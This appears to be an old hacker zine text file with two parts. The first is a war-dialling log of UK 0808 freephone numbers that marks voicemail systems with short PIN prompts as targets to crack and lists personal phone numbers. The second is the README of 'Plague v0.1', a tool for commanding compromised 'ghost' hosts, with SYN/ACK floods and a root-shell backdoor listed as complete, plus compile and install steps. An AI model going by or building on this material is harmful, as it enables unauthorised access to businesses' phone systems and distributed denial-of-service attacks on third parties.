1353 - 2 rings, odd tone, didn't respond to anything
1354 - ahu
1355 - ahu
1356 - no answer
1357 - odd ring, please hold the line, the number you are calling knows you
are waiting
1358 - ahu
1359 - voice
1360 - no answer
1361 - no answer
1362 - please hold the line, bleep
1363 - answerphone
1364 - 3 rings, answerphone
1365 - 3 rings, same as above
1366 - ahu
1367 - ages to connect, answerphone, #: please enter your pin, VMB
1368 - voice
1369 - no answer
1370 - no answer
1371 - no answer
1372 - no answer
1373 - no answer
1374 - ages to connect, no answer
1375 - no answer
1376 - no answer
1377 - ahu
1378 - no answer
1379 - odd ring, no answer
1380 - no answer
1381 - voice
1382 - no answer
1383 - no answer
1384 - ahu
1385 - ahu
1386 - ahu
1387 - no answer
1388 - no answer
1389 - voice
1390 - no answer
1391 - voice
1392 - no answer
1393 - voice
1394 - no answer
1395 - no answer
1396 - no answer
1397 - ahu
1398 - ahu
1399 - voice
1400 - no answer
1401 - ahu
1402 - 1 rings, newspapers, automated system, press 4 for extension
1403 - same as above
1404 - same as above
1405 - 1 ring, accidental death, cover line, report someone dead;P
1406 - 1 ring, consolidated financial insurance, year 2000 preperations?!?!?
VMB, * then # wanted a mailbox
1407 - no answer
1408 - no answer
1409 - ahu
1410 - 3 rings, modem/fax FAX
1411 - ahu
1412 - ahu
1413 - bleep
1414 - 1 ring, answerphone, didn't respond to dtmfs
1415 - answerphone, didn't respond to dtmfs
1416 - 1 ring, barklycard, recorded message
1417 - ahu
1418 - voice
1419 - odd ring, no answer
1420 - same as above
1421 - voice
1422 - 1 ring, answerphone, responded to dtmfs
1423 - no answer
1424 - no answer
1425 - 4 rings, answered with a bleep, bleep odd
1426 - 1 ring, modem
1427 - ahu
1428 - voice
1429 - no answer
1430 - 2 rings, modem/fax FAX
1431 - ahu
1432 - ahu
1433 - bleep, before answering
1434 - no answer
1435 - ahu
1436 - answerphone, responded to dtmfs, VMB
1437 - ahu
1438 - 3 rings, modem/fax FAX
1439 - 2 rings, bleep? c5? seemed to respond to dtmfs very wierd
1440 - no answer
1441 - 1 ring, voice, sounded like a mobile
1442 - voice, i think, answered then went silent
1443 - 1 ring, modem/fax FAX
1444 - slwo to conenct, growled down the phone at me?!?!?!?! SCARY!!!
------------------------------------------------------------------------------
UK Hand Scan of 0808 100 2XXX
by slinkie
------------------------------------------------------------------------------
This scan was done by slinky, mostly late at night and early in the morning
I scanned without dialing 141, various people on this list have run me up
wanting to know why i was ringing their home phone at midnight, etc,
all of this scan was done on my virgin mobile: 07941383089 feel free to
contact me on that, or leave a message on my voice mail box on,
+1 800 6887705 box 4582
000 - sky television, recorded mesage, seemed to respond to dtmf
001 - rang 4, no answer
002 - rang 4, no answer
003 - rang 4, no answer
004 - ahu
005 - rang 2, some answerphone, a woman picked up
006 - rang 1, answerphone, responded to dtmf
007 - rang 2, liverpool city center action line, answerphone, no dtmfs
008 - rang 1, answed, continued to ring answerphone responded to dtmf
009 - rang 2, answerphone #= please enter sec code, 4digit
010 - rang 3, voice
011 - ahu
012 - rang 1, answerphone #* = you have selected an invalid option
013 - no answer
014 - rang 3, voice
015 - rang 4, voice
016 - voice
017 - rang 3, answerphone * = please enter sec code 2 digit, hax this one
018 - rang 1, interesting automated system
019 - rang 4, no answer
020 - rang 1, odd tonez, FAX?
021 - rang 1, voice
022 - rang 3, voice
023 - rang 1, answered, continued to ring, ireland elec
024 - rang 4, no answer
025 - rang 1, voulinteer recruitment line , answerphone, no dtmfs
026 - rang 4, no answer
027 - rang 2, voice
028 - rang 4, no answer
029 - rang 4, no answer
030 - rang 4, no answer
031 - rang 3, voice
032 - rang 1, thank you for caling woolwich, you are in a que, on hold
033 - rang 4, no answer
034 - rang 1, answerphone, no dtmfs
035 - rang 4, no answer
036 - rang 4, no answer
037 - voice
038 - ahu
039 - ahu
040 - ahu
041 - rang 3, modem/fax FAX
042 - rang 1, modem/fax FAX
043 - ahu
044 - ahu
045 - rang 4, no answer
046 - temp out of service
047 - rang 4, voice
048 - rang 4, no answer
049 - voice
050 - ahu
051 - rang 4, bt enployee assistance progam?!?! all of our councelers are
busy?!?!? ring up and moan about your crap job as a bt engineeer
052 - rang 1, answerphone for help press *4 meridian?
053 - no answewr
054 - rang 4, no answer
055 - rang 4, no answer
056 - voice
057 - rang 4, no answer
058 - rang 4, hello, you have reached ext 7272 meridian ;)
059 - rang 4, no answer
060 - rang 4, voice
061 - rang 4, no answer
062 - rang 4, voicemail *4 for help, meridian
063 - rang 4, no answer
064 - rang 4, no answer
065 - rang 1, answered, and continued to ring, no answer
066 - ahu
067 - rang 2, BT accounts managment team, answerphone, no dtmfs
068 - ahu
069 - rang 4, no answer
070 - rang 4, no answer
071 - rang 2, voice
072 - rang 4, answerphone, no dtmfs, played back - fur elise while rewinding
the tape ;O
073 - rang 1, answered continued to ring, voice
074 - ahu
075 - this number does not accept incomeing calls, hum.. try it at other time
076 - rang 1, modem/fax FAX
077 - rang 2, answerphone * = please enter your security code
078 - no answer
079 - rang 2, BT enquirey support
080 - rang 3, should you wish to obtian further services call something
081 - rang 4, no answer
082 - rang 3, voice
083 - rang 4, no answer
084 - rang 3, modem/fax FAX
085 - rang 2, modem/fax FAX
086 - voice
087 - answered immediatly, modem
088 - rang 4, please enter the required extension number, PBX
089 - bleep
090 - ahu
091 - ahu
092 - rang 4, no answer
093 - answered immediatly, modem
094 - ahu
095 - ahu
096 - rang 2, modem
097 - rang 4, no answer
098 - rang 4, recorded message
099 - ahu
100 - answered immediatly, wessex water accounting dep answerphone dtmfs work
101 - ahu
102 - rang 4, no answer
103 - ahu
104 - rang 1, modem
105 - ahu
106 - rang 4, no answer
107 - ahu
108 - rang 1, WELL ODD, some odd introductions agency, run by a radio
station? Interesting, play with this one
109 - rang 4, answerphone british heart foundation, no dtmfs
110 - rang 4, no answer
111 - rang 4, no answer
112 - ahu
113 - ahu
114 - rang 4, no answer
115 - rang 4, no answer
116 - answered immediatly, modem
117 - ahu
118 - rang 2, ireland elec
119 - answered immediatly, modem
120 - rang 4, no answer
121 - rang 4, no answer
122 - rang 4, no answer
123 - temp out of service
124 - rang 1, readers digest ofderline, answerphone responded to dtmfs
125 - rang 1, answerphone # = please enter mailbox number 4 digit boxes,
tells you when you have a valid box, 4 attempts
126 - rang 1, answerphone same as 24
127 - rang 4, no answer
128 - rang 1, sorry this line is no longer valid, please dial 08081002125
129 - rang 1, same as 25
130 - ahu
131 - rang 4, voice
132 - ahu
133 - ahu
134 - rang 3, answerphone, no dtmfs
135 - ahu
136 - rang 2, voice
137 - ahu
138 - ahu
139 - rang 1, answerphone, no dtmfs
140 - rang 2, voice
141 - rang 4, no answer
142 - rang 4, no answer
143 - rang 2, answerphone * = enter sec code 2 digit 2 attempts
144 - ahu
145 - rang 4, no answer
146 - rang 2, please hold the line while we try to connect you
147 - rang 4, no answer
148 - ahu
149 - ahu
150 - ahu
151 - rang 2, answerphone, no dtmf
152 - rang 1, northern ireland elec
153 - your call is being transfered, please hold. answerpohne *= four digit
pin
154 - ahu
155 - ahu
156 - ahu
157 - ahu
158 - ahu
159 - rang 1, you have been forwarded to a voice mail system, however, the
person at extension 2584 does not subscribe to this service, look
at this one, hum. doesn't respond to dtmf
160 - rang 2, voice
161 - ahu
162 - rang 4, no answer
163 - ahu
164 - rang 2, btcellnet
165 - rang 2, same as above
166 - ahu
167 - rang 2, btcellnet
168 - rang 2, btcellnet
169 - rang 4, no answer
170 - btcellnet
171 - rang 2, btcellnet
172 - rang 2, btcellnet
173 - ahu
174 - temp out of service
175 - rang 2, btcellnet
176 - rang 4, no answer
177 - ahu
178 - 1 ring, all our operators are busy, responded to dtmfs
179 - rang 3, no answer
180 - ahu
181 - rang 2, thank you for calling somone answerphone
182 - rang 1, staples customer accounts
183 - rang 1, answerphone responded to dtmf
184 - rang 4, no answer
185 - rang 1, modem/fax FAX
186 - rang 2, answerphone, responded to dtmfs with bleeps 2 digit pin
187 - rang 1, lloyds tsb, no dtmfs
188 - ahu
189 - ahu
190 - rang 4, no answer
191 - rang 4, no answer
192 - ahu
193 - rang 4, no answer
194 - rang 2, voice
195 - rang 4, no answer
196 - ahu
197 - ahu
198 - ahu
199 - ahu
200 - rang 1, some automated system, insurance
201 - rang 3, voice
202 - rang 3, RAF recruitment line, automated sustem
203 - rang 4, no answer
204 - rang 1, voice
205 - rang 2, voice
206 - bleep
207 - bleep
208 - rang 3, modem/fax FAX
209 - bleep
210 - bleep
211 - ahu
212 - rang 3, voice
213 - bt
214 - rang 4, something furnature, anserphone * = please enter your sec code
215 - rang 4, no answer
216 - ahu
217 - rang 2, bleep on pickup, answerphone, didn't respond to dtmfs
218 - bleep
219 - ahu
220 - ahu
221 - rang 4, no answer
222 - rang 1, dtmf on pickup, all operators are busy, put me on hold # =
please enter your id, 3 digit 1 attempt
223 - rang 2, voice
224 - rang 4, no answer
225 - rang 1, answerphone, no dtmfs
226 - ahu
227 - ahu
228 - rang 1, voice
229 - rang 2, bt northern ireland sales?! VMB not really hackable
230 - rang 2, modem/fax FAX
231 - ahu
232 - ahu
233 - ahu
234 - ahu
235 - ahu
236 - rang 4, no answer
237 - rang 1, welcome to bt, this system will connect you to the bt
department of your choice
238 - ahu
239 - rang 2, BT test number, said that 2 times and hung up
240 - rang 4, no answer
241 - rang 4, no answer
242 - rang 4, no answer
243 - very slow to connect, rang 4, no answer
244 - welcome to your customer service help desk, please selct something
245 - rang 4, no answer
246 - ahu
247 - rang 1, voice
248 - slow to connect, rang 1, answerphone
249 - rang 4, no answer
250 - ahu
251 - 4 rings, flymail??? answerphone, no dtmfs
252 - voice
253 - rang 4, no answer
254 - rang 4, no answer
255 - answered immediatly, voice
256 - rang 2, voice
257 - rang 2, barklys online banking, no dtmfs
258 - rang 4, no answr
259 - rang 3, modem/fax FAX
260 - rang 4, no answer
261 - rang 4, no answer
262 - ahu
263 - answered immediatly, answerphone? responded to dtmfs
264 - rang 4, no answer
265 - rang 4, no answer
266 - rang 1, bt net services? recorded message, no dtmf call: 0800699879
267 - rang 5, no answe
268 - rang 2, bt business sales, no dtmfs
269 - ahu
270 - rang 2, modem/fax FAX
271 - rang 2, same as 68
272 - rang 2, modem/fax FAX
273 - rang 1, same as 71
274 - rang 1, voice bt business reception
275 - rang 2, continued to ring, northern ireland elec
276 - rang 4, no answer
277 - ahu
278 - rang 2, northern ire elec
279 - ahu
280 - rang 4, no answer
281 - ahu
282 - rang 2, voice
283 - rang 4, no answer
284 - rang 4, no answer
285 - ahu
286 - rang 4, no answer
287 - rang 2, voice, bloke, answered the phone with "yeah?" "whois this?"
288 - ahu
289 - rang 2, answerphone, no dtmfs
290 - rang 4, no answer
291 - ahu
292 - rang 2, answerphone, responded to dtmfs with bleeps 2 dig pin
293 - ahu
294 - rang 4, no answer
295 - 1 ring, 3m specialty materials cust info line, some automated shit
296 - rang 4, no answer
297 - rang 2, answerphone, no dtmfs
298 - ahu
299 - rang 2, answerphone, no dtmfs
300 - rang 1, answerphone, no dtmfs
301 - rang 1, answerphone, responds to dtmfs
302 - rang 3, voice
303 - rang 3, answerphone, responded to dtmfs
304 - rang 1, answerphone, # = please enter your 4 digit pin code, 3 attempts
305 - ahu
306 - rang 3, answerphone, no dtmfs
307 - rang 1, voice
308 - ahu
309 - rang 4, no answer
310 - rang 4, no answer
311 - rang 4, no answer
312 - rang 4, no answer
313 - rang 4, no answer
314 - rang 4, no answer
315 - rang 1, voicemail.. doesn't look hackable, has well good hold music
316 - rang 4, no answer
317 - rang 2, modem/fax FAX
318 - ahu
319 - rang 4, no answer
320 - rang 4, no answer
321 - rang 4, no answer
322 - rang 4, no answer
323 - rang 4, no answer
324 - answered immediatly, BT customer options team automated answerphone
325 - ahu
326 - slow to connect, 3 rings, voice
327 - rang 4, no answer
328 - answered immeditaly, modem
329 - rang 4, no answer
330 - rang 4, no answer
331 - rang 4, no answer
332 - ahu
333 - rang 4, no answer
334 - ahu
335 - rang 4, no answer
336 - rang 4, no answer
337 - rang 1, answered continued to ring, prob irc elec, no answer
338 - rang 1, same as above
339 - rang 4, no answer
340 - ahu
341 - ahu
342 - ahu
343 - ahu
344 - ahu
345 - ahu
346 - temp out of service
347 - rang 2, welcome to the freephone something property hotline, * =
enter the mailbox number you wish to send a message to, looks good
348 - rang 4, voice
349 - ahu
350 - rang 4, no answer
351 - rang 4, no answer
352 - rang 4, no answer
353 - rang 4, no answer
354 - ahu
355 - ahu
356
- temp out of service
357 - temp out of service
358 - ahu
359 - rang 4, no answer
360 - rang 2, continued to ring, prob ire elec on answer
361 - rang 3, recorded message, answerphone??? odd didn't hang up, like it
was waiting for something
362 - odd ring, rang 2, btcellnet standard shit
363 - same as above
364 - ahu
365 - slow to connect, odd ring, 2 rings, same as 62
366 - ahu
367 - answered immediatly, answerphone, reponded to dtmfs
368 - ahu
369 - ahu
370 - rang 2, ire elec
371 - rang 4, no answer
372 - ahu
373 - rang 4, no answer
374 - rang 4, no answer
375 - rang 1, ire elec
376 - rang 2, answerphone, no dtmfs
377 - ahu
378 - ahu
379 - slow to do anything, 2 rings, btcellnet shit
380 - rang 4, no answer
381 - same as 79
382 - same as above
383 - this number is now closed, recorded message
384 - rang 4, no answer
385 - same as 79
386 - same as above
387 - rang 4, no answer
388 - ahu
389 - asme asx 79
390 - rang 4, no answer
391 - same as 79
392 - sam as above
393 - rang 4, no answer
394 - ahu
395 - answered immediatly, bbc conferenceing service, put me on hold
396 - ahu
397 - rang 3, answerphone, dtmfs
398 - rang 4, answerphone #= enter your mailbox number followed by #
tells you when you have a valid box 3 attempts
399 - ahu00 - answered immediatly, modem
401 - rang 4, no answer
402 - rang 2, answerphone, appeared to respond to dtmfs
403 - rang 4, no answer
404 - ahu
405 - rang 4, no answer
406 - ages to connect, rang 4, no answer
407 - ages to connect, odd ring, rang 2, voice
408 - ahu
409 - rang 4, no answer
410 - rang 1, answered, then continued to ring, no answer
411 - ahu
412 - bt
413 - ahu
414 - rang 4, no answer
415 - ahu
416 - ahu
417 - slow to connect, loud ring, 2 rings, abbey national, recorded message
418 - rang 4, no answer
419 - rang 4, no answer
420 - rang 4, no answer
421 - rang 4, no answer
422 - ahu
423 - ahu
424 - rang 1, answerphone, responded to dtmfs
425 - ahu
426 - rang 4, bleep, pause, answerphone, no dtmfs
427 - rang 4, no answer
428 - rang 3, voice
429 - rang 4, no answer
430 - temp out of service
431 - ahu
432 - rang 4, no answer
433 - ahu
434 - answered immediatly, automated system
435 - ahu
436 - rang 1, answered, answerphone, responded to dtmfs with "nothing to
confirm, meridian?
437 - rang 4, no answer
438 - rang 4, no answer
439 - rang 4, no answer
440 - rang 4, no answer
441 - bt
442 - rang 3, voice
443 - rang 4, no answer
444 - ahu
445 - rang 4, no answer
446 - rang 4, no answer, bad quality ring, odd
447 - rang 4, no answer
448 - ahu
449 - rang 4, no answer
450 - rang 3, answerphone, no dtmfs
451 - temp out of service
452 - ahu
453 - rang 2, bt business something, answerphone, responds to dmtf
454 - rang 4, no answer
455 - ahu
456 - rang 4, no answer
457 - ahu
458 - 1 ring, modem
459 - ahu
460 - rang 4, no anser
461 - answered immediatly, answerphone, responded to dtmfs
462 - ahu
463 - rang 4, no answer
464 - answered immediatly answerphone, responded to dtmfs
465 - rang 4, no answer
466 - ahu
467 - rang 4, no anser
468 - rang 3, royal bank direct banking, odd just announced them selves
and hung up, voice recording
469 - ahu
470 - ahu
471 - rang 1, answerphone, responded to dtmfs
472 - rang 1, answered and continued to ring, northern ireland elec grr
473 - rang 1, same as above :((
474 - ages to conenct, rang 4, no answer
475 - rang 4, answerphone, no dtmfs
476 - rang 2, same as 72
477 - ahu
478 - ahu
479 - ahu
480 - answered immediatly, then rang, some emergency insurance line
481 - ahu
482 - rang 4, no answer
483 - rang 2, same as 72
484 - ahu
485 - rang 4, no answer
486 - rang 4, no answer
487 - rang 1, then continued to ring, same as 72
488 - ahu
489 - rang 4, no answer
490 - rang 4, no answer
491 - ahu
492 - rang 4, no answer
493 - answered immediatly, modem
494 - ahu
495 - rang 4, no answer
496 - ahu
497 - rang 4, no answer
498 - rang 1, answered, modem :)
499 - ahu
500 - ahu
501 - slow to connect, rang 4, no answer
502 - ahu
503 - ahu
504 - ahu
505 - rang 4, no answer
506 - ahu
507 - ahu
508 - rang 4, no answer
509 - rang 1, cpp jobsmart hotline, answerphone, responded to dtmfs
510 - rang 4, no answer
511 - rang 4, no answer
512 - temp out of service
513 - ahu
514 - ahu
515 - rang 4, no answer
516 - ahu
517 - rang 3, answerphone, responded to dtmfs, well minged
518 - rang 1, voice
519 - ahu
520 - rang 2, sorry, but this line is currently not in use
521 - answered immediatly, modem
522 - rang 4, no answer
523 - ahu
524 - rang 4, no answer
525 - answered immediatly, recorded message
526 - rang 4, no answer
527 - rang 1, voice
528 - ahu
529 - rang 2, voice
530 - rang 3, voice
531 - rang 4, no answer
532 - rang 4, no answer
533 - ahu
534 - ahu
535 - rang 2, answerphone, no dtmfs
536 - ahu
537 - well slow, rang 3, voice
538 - rang 4, no answer
539 - ahu
540 - rang 4, no answer
541 - rang 4, no answer
542 - bt
543 - answered immediatly, recorded message, dtmfs did nothing
544 - ahu
545 - rang 1, goodevening, welcome to bt fault report, press your * button
very educational, for testing lines, automated ;P If the phone never
rings, press 1, HaHaHa, Look at this one some more
546 - rang 4, no answer
547 - ahu
548 - rang 4, no answer
549 - rang 4, no answer
550 - rang 4, 50hz tone in background, loud noize, voice "newzdesk?"
551 - temp out of service
552 - ahu
553 - rang 4, no answer
554 - ahu
555 - answered immediatly, readers digest customer servs, answerphone
556 - rang 3, voice, "rapid support services"
557 - ahu
558 - ahu
559 - rang 4, no answer
560 - rang 4, no answer
561 - ahu
562 - ahu
563 - ahu
564 - ahu
565 - ahu
566 - ahu
567 - ahu
568 - ahu
569 - rang 4, no answer
570 - rang 4, no answer
571 - ahu
572 - rang 3, please enter required extension PBX?
573 - rang 2, answerphone, didn't respond to dtmfs
574 - ahu
575 - rang 4, no answer
576 - rang 4, no answer
577 - ahu
578 - rang 4, no answer
579 - odd ring, rang 4, no answer
580 - rang 4, no answer
581 - ahu
582 - ahu
583 - ahu
584 - rang 4, answerphone,no dtmfs
585 - rang 2, answerphone, no dtmfs
586 - ahu
587 - rang 4, no answer
588 - ahu
589 - ahu
590 - rang 4, no answer
591 - odd ring, rang 2, sorry, this service is currently unavailable
592 - ahu
593 - rang 4, modem/fax modem?!?!? odd after 4 rings
594 - ahu
595 - rang 2, answerphone, no dtmfs
596 - odd ring, no answer
597 - ahu
598 - ahu
599 - ahu
600 - rang 4, no answer
601 - rang 3, voice
602 - rang 1, you have been forwarded to a voice mail system, no dtmfs
603 - rang 4, no answer
604 - ahu
605 - ahu
606 - ahu
607 - rang 2, voice
608 - rang 4, no answer
609 - odd ring rang 3, voice
610 - rang 4, no answer
611 - ahu
612 - rang 4, no answer
613 - rang 4, no answer
614 - rang 4, no answer
615 - rang 2, answerphone, no dtmfs
616 - rang 2, answerphone, no dtmfs
617 - ahu
618 - rang 4, no answer
619 - ahu
620 - rang 4, no answer
621 - rang 2, answerphone, responded to dtmfs
622 - ahu
623 - ahu
624 - bt
625 - ahu
626 - rang 2, answerphone, didn't respond to dtmfs
627 - odd ring, rang 2, thank you for calling btcellnet, busy, no dtmfs
628 - rang 4, no answer
629 - ahu
630 - rang 4, no answer
631 - rang 2, modem/fax FAX
632 - rang 4, no answer
633 - ahu
634 - rang 4, no answer
635 - ahu
636 - ahu
637 - rang 1, voice
638 - rang 1, answerphone, no dtmfs
639 - rang 2, answerphone? responded to dtmfs, pressed #, did something?
640 - rang 4, no answer
641 - ahu
642 - ahu
643 - ahu
644 - ahu
645 - ahu
646 - rang 4, no answer
647 - rang 2, modem/fax FAX
648 - rang 2, modem
649 - ahu
650 - rang 4, no answer
651 - rang 4, please enter required extension, or hold for reception PBX
652 - ahu
653 - something, seroius incidents and trade line?!?!? hung up
654 - rang 4, same as 51, 3 digit extension
655 - ahu
656 - rang 3, answerphone, no dtmfs
657 - ahu
658 - ahu
659 - rang 1, answered and continued to ring, probably ire telicom :(
660 - answered immediatly, hung up immediatly
661 - ahu
662 - rang 4, no answer
663 - rang 2, answerphone, no dtmfs
664 - rang 2, answerphone, no dtmfs
665 - slow to connect, rang 3, voice
666 - satan, rang 4, no answer
667 - ahu
668 - ahu
669 - rang 4, no answer
670 - ahu
671 - rang 4, no answer
672 - rang 1, we are transfering your call to another call support center,
some automated info system?!?!? interesting
673 - ahu
674 - ahu
675 - ahu
676 - rang 4, no answer
677 - ahu
678 - rang 4, no answer
679 - ahu
680 - rang 2, answerphone, calor gas, responded to dtmfs
681 - rang 4, no answer
682 - odd ring, rang 2, odd accent, the service you require is unavailable
683 - rang 2, voice/answerphone?!? odd "good evening, adictive"
684 - ahu
685 - rang 4, no answer, voice
686 - odd ring, rang 2, infoline
687 - rang 4, no answer
688 - ahu
689 - rang 4, no answer
690 - rang 1, dtmf on pickup, tomy care line, responded to dtmf, * = please
dial the access code, appeared to be 4 digit... could be crax0red
691 - answerphone, class mag, automated info shit
692 - ahu
693 - ahu
694 - ahu
695 - ahu
696 - slow to ring, rang 4, no answer
697 - rang 4, no answer
698 - ahu
699 - ahu
700 - ahu
701 - ahu
702 - ahu
703 - rang 3, modem/fax FAX
704 - ahu
705 - rang 4, no answer
706 - ahu
707 - rang 4, no answer
708 - rang 2, modem/fax FAX
709 - ahu
710 - ahu
711 - ahu
712 - temp out of service
713 - rang 4, no answer
714 - temp out of service
715 - ahu
716 - ahu
717 - ahu
718 - rang 3, commoteck UK, please enter your employee number 6digit, 2 trys
719 - rang 3, something infoline, contraceptives???!? or summat
720 - temp out of service
721 - rang 4, no answer
722 - rang 1, answered then did nothing odd?!?!?
723 - ahu
724 - rang 4, no answer
725 - ahu
726 - rang 4, no answer
727 - please hold while we transfer you to our helpdesk ;P
728 - odd ring, rang 2, thanks you for calling btcellnet, were busy
729 - rang 4, dtmf on pickup, yellow pages, answerphone, responded to dtmfs
730 - rang 2, good evening welcome to bt residential customer services, auto
system
731 - rang 1, fooking northern ireland elec
732 - same as above
733 - ahu
734 - rang 4, no answer
735 - ahu
736 - rang 1, same as 31 fooksake
737 - slow to connect, odd ring, 3 rings, australian accent service is
currently unavailable
738 - bt cellner same 28
739 - ahu
740 - rang 4, no answer
741 - rang 4, no answer
742 - rang 4, no answer
743 - rang 4, no answer
744 - ahu
745 - rang 2, modem/fax FAX
746 - ahu
747 - rang 4, no answer
748 - ahu
749 - rang 4, no answer
750 - ahu
751 - ahu
752 - ahu
753 - ahu
754 - ahu
755 - ahu
756 - ahu
757 - ahu
758 - rang 4, no answer
759 - rang 2, tone on pickup, international fund for animal welfare,
automated system, wanting donations, * asks for passwd 8digits?!?
760 - answered immediatly, answerphone, responded to dtmf
761 - ahu
762 - ahu
763 - rang 4, modem/fax FAX
764 - ahu
765 - rang 1, modem
766 - ahu
767 - 1 ring, modem same as 65?
768 - rang 2, modem/fax FAX
769 - ahu
770 - ring 4, no answer
771 - ring 4 no answer
772 - rang 2, answered, continured to ring, voice
773 - rang 4, voice
774 - ahu
775 - rang 4, no answer
776 - ahu
777 - bt
778 - rang 4, no answer
779 - ahu
780 - rang 4, voice
781 - ahu
782 - ahu
783 - rang 4, no answer
784 - rang 4, no answer
785 - rang 2, northern ireland elec
786 - answered imediatly, sun teleco answewrphone, responded to dtmfs
787 - rang 2, modem
788 - ahu
789 - rang 1, answered, continured to ring, probably ire elec
790 - answered immediatly, modem
791 - bleep
792 - ahu
793 - rang 2, ireland elec
794 - rang 4, no answer
795 - rang 1, bt business reception, voice
796 - rang 1, ire elec
797 - rang 4 , no answer
798 - ahu
799 - ahu
800 - rang 4, no answer
801 - rang 2, readers digest order line, answerphone, responded to dtmfs
802 - rang 1, same as above, different message
803 - rang 4, same as above
804 - ahu
805 - welcome to the orange answerphone, standard orange mobile answerphone
806 - ahu
807 - rang 4, no answer
808 - rang 4, no answer
809 - temp out of service
810 - rang 4, no answer
811 - ahu
812 - rang 4, no answer
813 - ahu
814 - rang 4, no answer
815 - rang 4, no answer
816 - ahu
817 - rang 1, answered, then grr... another northern ireland electricity
818 - same as above
819 - same as above
820 - rang 4, no answer
821 - same as 17
822 - ahu
823 - same as 17
824 - same as 17
825 - same
826 - bloody nothern ireland elect
827 - same as above
828 - rang 4, no answer
829 - ages to do anytihng, odd ring, 3 rings, answerphone/recorded message
830 - odd ring, same as above
831 - ahu
832 - rang 4, no answer
833 - ahu
834 - ahu
835 - ahu
836 - ahu
837 - rang 2, answerphone no dtmfs
838 - rang 2, answerphone, responded to dtmfs
839 - ahu
840 - ahu
841 - ahu
842 - ahu
843 - ahu
844 - ahu
845 - ahu
846 - ahu
847 - ahu
848 - ahu
849 - ahu
850 - ahu
851 - ahu
852 - ahu
853 - ahu
854 - ahu
855 - ahu
856 - ahu
857 - ahu
858 - ahu
859 - ahu
860 - rang 4, no answer
861 - rang 4, answerphone, responded to dtmfs
862 - ahu
863 - ahu
864 - ahu
865 - rang 4, no answer
866 - ahu
867 - rang 2, answerphone, responded to dtmfs
868 - rang 4, no answer
869 - ahu
870 - rang 1, answered, then rang, northern ireland elec
871 - bleep
872 - rang 2, same as 70
873 - answered immediatly, modem
874 - ahu
875 - rang 1, voice
876 - rang 1, same as 70
877 - ahu
878 - ahu
879 - rang 2, same as 70
880 - rang 3, od tone on pickup answerphone
881 - slow to connect, 2 rings, voice
882 - ahu
883 - rang 4, no answer
884 - rang 2, same as 70
885 - rang 4, no answer
886 - rang 1, answered, then silent, odd tone?!?!? wierd????
887 - rang 1, vodaphone recall service, for 07785342028 please leave a msg
888 - ahu
889 - rang 2, same as 70
890 - rang 4, no answer
891 - rang 2, same as 70
892 - rang 3, voice
893 - ahu
894 - rang 4, no answer
895 - rang 4, no answer
896 - rang 1, voice
897 - answered immediatly, your reaced the exit?!?!? answerphone
898 - ring 2, same as 70
899 - ahu
900 - ahu
901 - rang 1, then answered, and continued to ring, 3 rings, voice
902 - rang 5, no answer
903 - no answer
904 - rang 5, no answer
905 - rang 2, then answered and continued to ring, irish voice, same as 01
906 - same as above
907 - same as above
908 - same as bove
909 - same as bove
910 - same as bove
911 - ahu
912 - same as 10
913 - same as above
914 - no answer
915 - same as 10
916 - same as bove
917 - same as bove
918 - same as bove
919 - same as bove
920 - ahu
921 - same as 19
922 - ahu
923 - same as 21
924 - same as bove
925 - same as bove
926 - same
927 - same
928 - same
929 - different ring, 5 rings, modem/fax FAX
930 - ahu
931 - same as 28
932 - same as bove
933 - ahu
934 - same as 32
935 - 2 rings, thanks you for calling, our offices are closed, leave a
in our VMB, responded to dtmfs
936 - same as above
937 - same as above
938 - rang 5, no answer
939 - no answer
940 - slow to connect, ring, ring, ring, ring, no answer
941 - slow, 3rings, modem/fax FAX
942 - 4, no answewr
943 - slow, voice
944 - rang 4, no answer
945 - slow to conenct, rang 4, no answer
946 - same as above
947 - ahu
948 - ahu
949 - very slow to connect, 2 rings, voice
950 - ahu
951 - slow to connect, 4 rings, no answer
952 - bt
953 - rang 3, voice same as 49
954 - ahu
955 - rang 4, no answer
956 - no asnwer
957 - ahu
958 - ahu
959 - rang 4, no answer
960 - ahu
961 - ahu
962 - rang 4, no answer
963 - rang 4, no answer
964 - rang 4, no answer
965 - rang 4, no answer
966 - ahu
967 - rang 4, no answer
968 - rang 4, no answer
969 - rang 4, no answer
970 - ahu
971 - ahu
972 - ahu
973 - temp out of service
974 - ahu
975 - answered immediatly, modem
976 - rang 3, dtmf on pickup, legal advice department, answerphone, dtmfs
977 - ahu
978 - ahu
979 - rang 4, voice
980 - rang 4, no answer
981 - ahu
982 - ahu
983 - ahu
984 - rang 2, answered, continued to ring, voice emergency services moreen
speaking??!??!?!
985 - ahu
986 - ahu
987 - ahu
988 - ahu
989 - ahu
990 - ahu
991 - ahu
992 - ahu
993 - rang 4, no answer
994 - rang 4, no answer
995 - rang 4, no answer
996 - ages to do anything, rang 4, no answer
997 - rang 4, no answer
998 - rang 4, no answer
999 - slow to connect, odd ring, 3 rings, it is the week commencing, ..
emergency info service of esso house letherhead, curently the
building is operating normally. ODD?
------------------------------------------------------------------------------
Plague v0.1
by datawar & blaznweed
------------------------------------------------------------------------------
_
_ __ | | __ _ __ _ _ _ ___
| '_ \| |/ _` |/ _` | | | |/ _ \
| |_) | | (_| | (_| | |_| | __/
| .__/|_|\__,_|\__, |\__,_|\___|
|_| |___/ v 0.1
1. About
the primary purpose of this program is to create an environment that it
capable of effectively coordinating a number of compromised hosts in a
distributed attack. The nature of this attack ranges from denial of
service to a sophisticated scan of the Internet for potential targets for
future compromise.
the program will consist of a client which runs on the users own
machine. The client communicates with a master server which will be
responsible for coordinating a set of ghost daemons.
|---- GHOST 1
|---- GHOST 2
CLIENT <-> MAINSERVER -->|---- GHOST 3
|---- .......
|---- GHOST N
(at the time of writing the client is not done so you will have to use
netcat for now , telnet will not do !@)
Feature list
FEATURE Description STATUS
Stream flood Distributed Ack flood Complete
Syn flood Distributed Syn flood Complete
Shell backdoor Root shell on demand Complete
Pingall Pings all ghosts to see which ones are up Complete
Port scan Distributed port scanner Coming soon
Strong crypto Encrypt Password and client server comm. Coming soon
Banner scanner Scan ports for well known strings Coming soon
solaris fake args Allow us to fake argv[0] on solaris Coming soon
2. Compilation
before you compile change the defines at the top of each source file to suit
you needs.
To compile on most systems simply type:
#gcc -o server -O3 server.c
#gcc -o ghost -O3 ghost.c
If you are using solaris you will have to type:
#gcc -o server -O3 -lnsl -lsocket -DSOLARIS
#gcc -o ghost -O3 -lnsl -lsocket -DSOLARIS
3. Installation
to install the ghost
simply type
#./ghost
it will auto go into the background and listen on the port that was defined
in the source file.
Before you can set the server running you weill have to make a file called
server.list. This file must contain the ip port and password of every box
